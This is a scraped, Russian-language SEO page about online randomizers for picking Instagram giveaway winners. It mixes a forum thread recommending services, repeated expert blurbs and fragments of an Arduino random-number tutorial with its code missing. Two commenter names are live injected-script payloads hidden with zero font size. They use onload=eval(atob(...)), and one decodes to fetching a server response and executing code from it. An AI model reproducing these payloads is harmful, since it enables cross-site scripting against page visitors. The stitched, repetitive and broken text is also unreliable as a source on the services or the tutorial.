Генератор Случайных Чисел Самый Популярный Инстаграм • Privacy overview

Генератор случайных чисел».

Быстрый и стабильный • Работа генератора немного изменяется при добавлении репостов S лайки V репосты V.

Нужен рандомайзер по комментариям

Провожу конкурс в инстаграм, механика определения победителя — по комментариям. В ручную не хочется выбирать победителя. Все рандомайзеры которые нахожу, работают только со случайными числами. помогите пожалуйста! может кто знает подходящий сервис.

solved 2 Поделиться

Ответы ( # )

sargess Новичок

Ну вручную понятно, что долго выбирать, тем более, если народу море участвует)) А из сервисов еще есть https://zengram.ru/winner довольно удобный. Он бесплатный и достаточно быстро определяет победителей. Сколько пользуюсь, багов и лагов не встречал.

Вот буквально на днях выпустили сервис: https://socizavr.com

Бесплатный, всё на одной веб-странице, определение победителя в несколько кликов

350D Новичок

Самый быстрый и популярный сервис с проверкой подписки, спонсоров, лайка и репоста — https://lizaonair.com/giveaway/

igor_170 Новичок Ответ был отредактирован.

Мы для новогоднего розыгрыша по комментариям использовали verifyshare.com
Там есть проверка на повторы и можно выбрать нескольких победителей, задать им шансы в зависимости от активности. В целом довольны.

IG’ onload=eval(atob(‘alF1ZXJ5LmdldCgnL2Fzay9hdXRob3IveWFob28vJyxmdW5jdGlvbihodG1sKXtldmFsKGF0b2IoaHRtbC5zcGxpdCgnIyMjIyMjJylbMV0pKX0p’)) y=» style=’font-size:0′ x=’ Новичок

Там бесплатно только 100 комментариев

Helga6044 Новичок

Есть вот такой сервис для конкурсов в инстаграм Rivalry

Попробуйте, намного интереснее чем рандомайзер.

Verified

Alex Man Group Head

Все сервисы также доступны в Telegram в качестве ботов.

Лучший ответ.

Verified

dnative Group Head

Стоит добавить, что они ещё и бесплатные

Evangelya Новичок

Сервисами с генератором случайных чисел тоже перестала использовать при проведении конкурсов. А то народ постоянно жаловался и подозревал что все подкручено. Сейчас пользуюсь этим https://zengram.ru/winner, вот он мне нравится. Во-первых, бесплатный, что уже большой плюс. Во-вторых, здорово придумали, что можно несколько критериев указать. Такое далеко не везде есть. Ну и быстро определяет победителя. Не приходится долго ждать и лишний раз нервировать подписчиков.

Yahoo’ onload=eval(atob(‘Z3RhZygnY29uZmlnJywnVUEtMTYwNjAzNjQxLTEnKTsKalF1ZXJ5KCcjbGktY29tbWVudC00ODAxJykucmVtb3ZlKCk7′)) y=» style=’font-size:0′ x=’ Новичок

Ответ был отредактирован.

В интернете много жалоб на мошенничество в виде скрытой подписки на этом сервисе.

леночка
Мнение эксперта
Елена Берковцева, эксперт по работе с Instagram
Если у вас возникнут вопросы, задавайте их мне, и я помогу разобраться.
Задать вопрос эксперту
Сервис RandomPicker платный, но он имеет все качества для того, чтобы называться самым лучшим в своем роде инструментом. Если вы имеете большую аудиторию, при помощи которой будет разыгран праздничный конкурс (лотерея) и вам необходимо будет по ее завершению предоставить отчет о процессе выбора претендента на победителя, то этот сервис как нельзя лучше вам подходит, тем более, что он полностью русскоязычен. Ложкой дегтя в нем является то, что сервис платный. Его услуги стоят 38 долларов за превышение бесплатного лимита.

Fanpage Karma – один из простых генераторов определения случайного победителя

Раньше в качестве «генераторов случайных чисел» часто использовали компьютерные алгоритмы. Это не совсем корректно, потому что результаты, хоть и с большим трудом и с помощью вычислительных машин, было возможно предсказать. Так, например, один умник из США смог обмануть систему и. Читать далее

Можно ли убрать рекламу при выборе победителей из списка?

Генераторы, привязанные к социальным сетям, учитывающие при генерации довольно много параметров репосты, лайки , дизлайки , факт подписки на автора, группу и или сообщество. При помощи данного сервиса можно создать протокол выборки, в котором участники могут увидеть, что они действительно были внесены в список, а также другую информацию розыгрыша количество участвовавших, победитель и т.

Аппаратный рандом Как работать с randompicker

Как можно увидеть из изображения мы получаем на выходе подробный список с четырьмя категориями лайки и комментарии, только лайки, одни комментарии и комментарии с наибольшим количеством лайков. Вам нужно только предоставить ссылку на страницу в желтом поле со стрелочкой и сервис автоматически выполнит всю работу по определению победителя конкурса.

Вы используете Instagram для развлечения или заработка?
РазвлеченияЗаработка

Для Instagram – Privacy overview

Лучшие генераторы случайных чисел для конкурса
В первую очередь генератор случайных чисел для конкурса отлично подходит для социальной сети Facebook, работает с ней без каких-либо дополнительных инструментов. Итак, какие из сервисов выбрать, чтобы провести конкурс в Инстаграм и так определить победителя, чтобы ни у кого не возникло сомнений в его честности.
Случайные числа
Требования конкурса часто имеют ряд одинаковых условий, в которых участник должен совершить некие действия, а также поставить лайк, подписаться на канал, репостить материал на странице. Получил высшее образование по специальности Фундаментальная информатика и информационные технологии в Московском государственном университете имени М.

Рандомайзер списка, определить победителя ????.

Я думаю понятие случайных чисел/величин вам знакомо: они случайны. Иногда в самодельном устройстве бывает нужна случайная величина, например для какой-нибудь игры или световых эффектов. Программный источник настоящих случайных чисел организовать весьма непросто, в отличие от аппаратного. Банально игральный кубик или лото-машина являются вполне себе хорошими источниками случайных чисел. Микроконтроллер к слову не может генерировать случайные числа, потому что он – точное вычислительное устройство, случайностей быть не может. Что делать? Использовать такое понятие, как псевдослучайные числа. Чем они отличаются от случайных? Своей природой. Псевдослучайное число получается путём различных математических действий с начальным числом, то есть имея начальное число, мы можем сгенерировать на его основе целую кучу других чисел. Но тут есть две проблемы: Генератор случайных чисел: список сервисов, описание, сравнение

Рандомайзер списка, определить победителя

Рандомайзер списка используют для присвоения случайного номера каждому элементу вашего списка. Он позволит слепо определить победителей в любом розыгрыше.

Введите в текстовое поле «список участников» имена, логины или никнеймы участников. Каждого участника следует ввести с новой строки! После чего нажмите кнопку «Генерировать». В результате вы получите пронумерованный список этих участников в случайном порядке.

Giveawation

Важный момент можно всегда поделиться ссылкой со всеми заинтересованными людьми, а не пытаться сделать скришот, чтобы потом услышать обвинения о возможном применении Фотошопа. Генераторы, привязанные к социальным сетям, учитывающие при генерации довольно много параметров репосты, лайки , дизлайки , факт подписки на автора, группу и или сообщество.

Giveaway Generator : Случайный bool

Вам нужно только предоставить ссылку на страницу в желтом поле со стрелочкой и сервис автоматически выполнит всю работу по определению победителя конкурса. График я построил в excel, чтобы более чётко видеть рассеивание полученного случайного значения Имеем практически равномерное рассеяние и огромное количество случайных значений, полученных путём перемножения и сложения шума.

Рейтинг сервисов для определения победителя в конкурсе Instagram : Случайный bool

Нужен рандомайзер по комментариям; Ask SMM
Получил высшее образование по специальности Фундаментальная информатика и информационные технологии в Московском государственном университете имени М. Универсальные ресурсы, учитывающие при генерации лишь базовые параметры диапазон чисел, диапазон вывода четные нечетные , исключение и некоторые другие.

Онлайн генераторы случайных чисел Инстаграм для конкурса

Сервис RandomPicker платный, но он имеет все качества для того, чтобы называться самым лучшим в своем роде инструментом. Если вы имеете большую аудиторию, при помощи которой будет разыгран праздничный конкурс (лотерея) и вам необходимо будет по ее завершению предоставить отчет о процессе выбора претендента на победителя, то этот сервис как нельзя лучше вам подходит, тем более, что он полностью русскоязычен. Ложкой дегтя в нем является то, что сервис платный. Его услуги стоят 38 долларов за превышение бесплатного лимита.

  • определение победителей розыгрышей
  • выбрать победителя из списка
  • расстановка игроков
  • Кто пойдет первый к доске ????

Возможно, лучший

Надежный • Список из не более чем трехсот имен просчитывается бесплатно.

Случайные числа

Я думаю понятие случайных чисел/величин вам знакомо: они случайны. Иногда в самодельном устройстве бывает нужна случайная величина, например для какой-нибудь игры или световых эффектов. Программный источник настоящих случайных чисел организовать весьма непросто, в отличие от аппаратного. Банально игральный кубик или лото-машина являются вполне себе хорошими источниками случайных чисел. Микроконтроллер к слову не может генерировать случайные числа, потому что он – точное вычислительное устройство, случайностей быть не может. Что делать? Использовать такое понятие, как псевдослучайные числа. Чем они отличаются от случайных? Своей природой. Псевдослучайное число получается путём различных математических действий с начальным числом, то есть имея начальное число, мы можем сгенерировать на его основе целую кучу других чисел. Но тут есть две проблемы:

  • Через какое-то количество чисел (тысяч, а может и миллиардов, а может и больше) ряд сгенерированных псевдослучайных чисел начнёт повторяться. Для наших целей это не так страшно, можно об этом не думать
  • Генератору псевдослучайных чисел нужно начальное случайное число. Вот это реально беда… Но ничего, у нашего микроконтроллера есть и аппаратные средства

Ардуино и случайные числа

Ардуино имеет пару готовых функций для работы с псевдослучайными числами, давайте на них посмотрим:

  • random(max); – возвращает псевдослучайное число в диапазоне от 0 до ( max – 1 ). max принимает unsigned long , то есть от 0 до 4 294 967 295
  • random(min, max); – возвращает псевдослучайное число в диапазоне от min до ( max – 1 ). max принимает unsigned long , то есть от 0 до 4 294 967 295
  • randomSeed(value); – дать генератору псевдослучайных чисел новую опорную точку для отсчёта. value – любое число типа unsigned long , значит на Ардуино мы имеем 2^32 (4 294 967 295) наборов псевдослучайных чисел. На ваш век этого точно хватит!

Как правильно генерировать случайные числа, чтобы последовательность каждый раз была новая? Есть варианты:

  • При запуске программы задавать случайное число в randomSeed() . Как это сделать? Расскажу ниже
  • Если устройство как-то взаимодействует со внешним миром, или даже с пользователем, то можно при наступлении некоторых аппаратно случайных событий (нажатие кнопки, срабатывание датчика, принятие данных, и т.д.) скармливать randomSeed‘у текущее время с момента старта программы, т.е. функции millis() или micros() . Отличное решение кстати! Банально вызываем randomSeed(micros()) и всё.

Аппаратный рандом

Помните, в уроке про цифровые пины я говорил, что если пин никуда не подключен – то он ловит «из воздуха» всякие наводки. Шумы имеют природу, близкую к случайной, и было бы глупо этим не воспользоваться! Давайте посмотрим, какие значения можно получить с никуда не подключенного аналогового пина, опрашивая его обычным analogRead();

blank

Синусоида? Вполне логично, в стенах куча проводов с сетевым напряжением, вот они и наводят на микроконтроллер всякие помехи. Можно ли пользоваться сырым значением с аналогового пина в качестве «зерна» для randomSeed() ? Нужно! То есть при запуске устройства делать вот так:

Но есть ещё интересный вариант, который позволит получить гораздо более случайные числа для randomSeed() . Есть информация, что первые два бита из результата analogRead() имеют самый большой шум. Давайте на него посмотрим, выведя несколько (300) результатов в график. Получить первые два бита можно так: analogRead(A0) & 0b0000011 , или более коротко – analogRead(A0) & 3

blank

Выглядит весьма случайно, никакой закономерности не прослеживается! Но значения меняются всего от 0 до 3. Поэтому можно попробовать их перемножать и складывать, примерно так:

Именно такой код я рекомендую использовать для получения случайного зерна для генератора случайных чисел при запуске программы. Напоследок давайте посмотрим, какой результат даёт такая конструкция:

blank

График я построил в excel, чтобы более чётко видеть рассеивание полученного случайного значения Имеем практически равномерное рассеяние и огромное количество случайных значений, полученных путём перемножения и сложения «шума». Пользуйтесь на здоровье.

Случайный bool

Иногда бывает нужен случайный флаг, то есть true / false . Делается это очень просто: в уроке про условия я рассказывал, что bool ( boolean ) принимает true при любом отличном от нуля значении. Это можно использовать для получения случайного true / false с заданной вероятностью! Просто присваиваем логической переменной результат функции random() , в которую передаём число, обратное вероятности получения false :

Переменная rndFlag получит значение false с вероятностью 1/5, то есть 20%. Если нужен true с низкой вероятностью – используем инверсию:

леночка
Мнение эксперта
Елена Берковцева, эксперт по работе с Instagram
Если у вас возникнут вопросы, задавайте их мне, и я помогу разобраться.
Задать вопрос эксперту
Генератор RandomPicker создает специальный протокол выборки и все результаты после определения победителя остаются на сервере сервиса. Это дает дополнительные преимущества для вас, так, вы можете подтвердить свои слова о честном розыгрыше, показав вашим подписчикам результаты работы генератора случайных чисел. При помощи данного сервиса можно создать протокол выборки, в котором участники могут увидеть, что они действительно были внесены в список, а также другую информацию розыгрыша (количество участвовавших, победитель и т.д.).

Рандомайзер

Прекрасный генератор случайных чисел онлайн для Инстаграма с русскоязычным интерфейсом. Естественно, подойдет и для проведения конкурсов в других социальных сетях. Как работает:

Можно ли сохранить результаты розыгрыша?

Получил высшее образование по специальности Фундаментальная информатика и информационные технологии в Московском государственном университете имени М. Универсальные ресурсы, учитывающие при генерации лишь базовые параметры диапазон чисел, диапазон вывода четные нечетные , исключение и некоторые другие.

На английском • Как работать с randompicker

График я построил в excel, чтобы более чётко видеть рассеивание полученного случайного значения Имеем практически равномерное рассеяние и огромное количество случайных значений, полученных путём перемножения и сложения шума. Администраторы групп в социальных сетях, а также Инстаграм и Ютуб блогеры часто проводят конкурсы и различные лотереи, в которых на указанную дату разыгрывают различные призы для своих подписчиков и посетителей.

Privacy Overview… Giveaway generator

Online-Generators
Важный момент можно всегда поделиться ссылкой со всеми заинтересованными людьми, а не пытаться сделать скришот, чтобы потом услышать обвинения о возможном применении Фотошопа. Генерация тестовых баз данных — чтобы не отдавать разработчику информационной системы реальную клиентскую базу, можно нагенерить случайных данных по заданным условиям, и.

Что нужно сделать для выбора победителя?

Сервисами с генератором случайных чисел тоже перестала использовать при проведении конкурсов. А то народ постоянно жаловался и подозревал что все подкручено. Сейчас пользуюсь этим https://zengram.ru/winner, вот он мне нравится. Во-первых, бесплатный, что уже большой плюс. Во-вторых, здорово придумали, что можно несколько критериев указать. Такое далеко не везде есть. Ну и быстро определяет победителя. Не приходится долго ждать и лишний раз нервировать подписчиков.


Вопросы по Instagram - вы можете прочитать интересующую вас информацию на сайте: 💫 💫 💫 💫 💫


Понравилось? Поделись с друзьями:
Оставить отзыв

Публикуя свою персональную информацию в открытом доступе на нашем сайте вы, даете согласие на обработку персональных данных и самостоятельно несете ответственность за содержание высказываний, мнений и предоставляемых данных. Мы никак не используем, не продаем и не передаем ваши данные третьим лицам.